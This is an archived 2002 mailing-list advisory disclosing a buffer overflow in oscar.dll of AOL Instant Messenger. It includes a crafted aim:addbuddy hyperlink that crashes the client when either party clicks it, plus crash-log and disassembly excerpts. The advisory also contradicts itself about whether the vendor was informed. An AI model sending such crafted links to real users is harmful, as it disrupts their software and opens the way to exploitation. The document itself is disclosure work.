OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Adonis.No.Spam (adonis1videotron.ca)
Date: Thu Mar 07 2002 - 06:23:25 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                               .--------.
                              / Bugs \
    +-----------------------------------------------------------------------.
                                                                            :
    Affected : All versions of AIM including the beta 4.8.2646 :
    Type : Local/Remote Buffer Oveflow :
    Date : 29-02-2002 :
    Author : NtWaK0 & Recon www.SafeHack.com :
    +-----------------------------------------------------------------------.
    We think this was not reported. Nothing was found publicaly about this.

    +------------------.
    Crash of AIM Client \
    +--------------------`--------------------------------------------------.
                                                                            :
    +-----------. :
     Disclaimer \ :
    +-------------`---------------------------------------------------------.
    The information in this advisory is believed to be true based on :
    experiments though it may be false. The opinions expressed in this :
    advisory and program are my own and NOT of any company. :
    In Fact I do not work for no one at the present time. :
                                                                            :
    This material is presented for informational and entertainment purposes :
    only, and to satisfy the curious. Any activities described in this file :
    which involve vandalism, theft, or any other illegal activities are :
    recounted from third-party conversations. I do not condone or encourage :
    vandalism or theft. I do not accept any liability for anything anyone :
    does with this information. :
    Remember: Use a computer in ways that ensure respect for your fellows. :
                                                                            :
    +-------------. :
     Brief History \ :
    +---------------`-------------------------------------------------------.
    If you are running any version of AIM (Aol Instant Messenger) you are :
    affected with this crash, vendor has been informed. :
                                                                            :
    AOL's Instant Messenger client (AIM) has contain a buffer overflow :
    vulnerability in the file oscar.dll. :
    Instant Messenger allows AOL users to send short messages between :
    its users. A buffer overflow in oscar.dll in al register. :
                                                                            :
    +---------------------------+ :
    >>> Test OS Applications <<< :
    +---------------------------+ :
    Tested on all version of Microsoft Windows Family of OS with the latest :
    beta version of AIM 4.8.2646 :
                                                                            :
    +-----------. :
     The Problem \ :
    +-------------`---------------------------------------------------------.
    Normaly I do not use AIM. But a friend of mine "Recon" told me about a :
    strange problem he found. Since I am curiouse I did install AIM and done:
    some test to find out what was going on again thanks Recon. :
                                                                            :
    AOL's Instant Messenger client (AIM) has contain a buffer overflow :
    vulnerability in the file oscar.dll. :
    Instant Messenger allows AOL users to send short messages between :
    its users. A buffer overflow in oscar.dll in al register. :
                                                                            :
    The buffer Overflow will happen if you send a special crafted message to:
    an AIM user. :
                                                                            :
                                                                            :
                                                                            :
    To see the buffer Overflow do the following steps: :
    1- Make sure you have AIM 4.8.2646 installed :
    2- Open a new IM window and click the link button to setup a hyperlink :
       for your buddy. :
    4- Input the exact text into the link :
       aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,:
       12345678,12345678,12345678,12345678,12345678,12345678&groupname= :
       12345678,12345678,12345678,12345678,12345678,12345678,12345678 :
       ,12345678,12345678,12345678, :
                                                                            :
    5- The text can be anything as long as it meets the format of 8 :
       characters for each word to add as a screenname and a groupname, the :
       instances should be 11 for the screenname and 10 for the groupname :
    6- A memory dump will occurs as soon as the hyperlink is clicked by :
       either side (You or your buddy). :
                                                                            :
    This was taken after the buffer overflow occured from Drwatson log :
                                                                            :
    function: o_strncpy :
            1218b4f9 8b4508 mov eax,[ebp+0x8] ss:00c :
            1218b4fc 3b450c cmp eax,[ebp+0xc] ss:00c :
            1218b4ff 7419 jz LoadRendezvousString+0x39f6 ( :
            1218b501 8a06 mov al,[esi] :
            1218b503 8807 mov [edi],al :
            1218b505 47 inc edi :
            1218b506 ff4508 inc dword ptr [ebp+0x8] ss:00c :
            1218b509 46 inc esi :
            1218b50a 43 inc ebx :
            1218b50b 8a06 mov al,[esi] :
    FAULT ->1218b50d 8807 mov [edi],al :
            1218b50f 47 inc edi :
            1218b510 ff4508 inc dword ptr [ebp+0x8] ss:00c :
            1218b513 46 inc esi :
            1218b514 43 inc ebx :
            1218b515 803e00 cmp byte ptr [esi],0x0 :
            1218b518 75cf jnz LoadRendezvousString+0x3bc5 ( :
            1218b51a 8b4d0c mov ecx,[ebp+0xc] ss:00c :
            1218b51d 3bf9 cmp edi,ecx :
            1218b51f 7312 jnb OscoreUseCurrentAcceleratorTable+ :
            1218b521 2bcf sub ecx,edi :
            1218b523 33c0 xor eax,eax :
                                                                            :
    Below is a portion of the asm code for the file oscar.dll :
    =============================================== :
    .text:1218B4E9 loc_1218B4E9: ; CODE XREF: o_strncpy+61j :
    .text:1218B4E9 cmp edi, [ebp+lpsz] :
    .text:1218B4EC jnb short loc_1218B533 :
    .text:1218B4EE push esi ; lpsz :
    .text:1218B4EF call ds:CharNextA
    .text:1218B4F5 cmp eax, ebx
    .text:1218B4F7 jnz short loc_1218B50B
    .text:1218B4F9 mov eax, [ebp+arg_0]
    .text:1218B4FC cmp eax, [ebp+lpsz]
    .text:1218B4FF jz short loc_1218B51A
    .text:1218B501 mov al, [esi]
    .text:1218B503 mov [edi], al
    .text:1218B505 inc edi
    .text:1218B506 inc [ebp+arg_0]
    .text:1218B509 inc esi
    .text:1218B50A inc ebx
    ===============================================
    .text:1218B50B loc_1218B50B: ; CODE XREF: o_strncpy+40j
    .text:1218B50B mov al, [esi]
    .text:1218B50D mov [edi], al ; <<<---HERE IS THE P
    .text:1218B50F inc edi
    .text:1218B510 inc [ebp+arg_0]
    .text:1218B513 inc esi
    .text:1218B514 inc ebx
    .text:1218B515 cmp byte ptr [esi], 0
    .text:1218B518 jnz short loc_1218B4E9
    =================================================
    .text:1218B51A loc_1218B51A: ; CODE XREF: o_s
    .text:1218B51A ; o_strncpy+48j
    .text:1218B51A mov ecx, [ebp+lpsz]
    .text:1218B51D cmp edi, ecx
    .text:1218B51F jnb short loc_1218B533
    .text:1218B521 sub ecx, edi
    .text:1218B523 xor eax, eax
    .text:1218B525 mov edx, ecx
    .text:1218B527 shr ecx, 2
    .text:1218B52A repe stosd
    .text:1218B52C mov ecx, edx
    .text:1218B52E and ecx, 3
    .text:1218B531 repe stosb
    .text:1218B533
    ==================================================
                                                                            :
    :
                                                                            :
    Here is the stack variables :
    =========================== :
    00000000 s db 4 dup(?) :
    00000004 r db 4 dup(?) :
    00000008 arg_0 dd ? :
    0000000C lpsz dd ? ; offset (FFFFFFFF) :
    00000010 arg_8 dd ? :
                                                                            :
    This issue has not been tested on third party software that supports :
    the oscar protocol :
                                                                            :
    +------------. :
     The Solution \ :
    +--------------`--------------------------------------------------------.
    We could not located AIM email to send them this issue. :
    +-----------------------------------------------------------------------.

    ________________________________________________________________________
    The only secure computer is one that's unplugged, locked in a safe,
    and buried 20 feet under the ground in a secret location... and i'm
    not even too sure about that one"--Dennis Huges, FBI.
    ____________________________________________________________.___________
    Live Well Do Good www.SafeHack.com |
    Je Pense, Donc Je Suis \(|)/
    I know I ain't perfect, but i'm 99 point 9 percent :) --(")--
    RFCs are meant to be read and followed…:) /`\ NtWaK0
    ________________________________________________________________________
    Connect yourself to the main computer and let me take you to a
    cybernetic ride. Are you connected to the right cybernet? If you are,
    finally you are connected to my brain.
    ________________________________________________________________________
    -=- Use a computer in a ways that ensure respect for your fellow -=-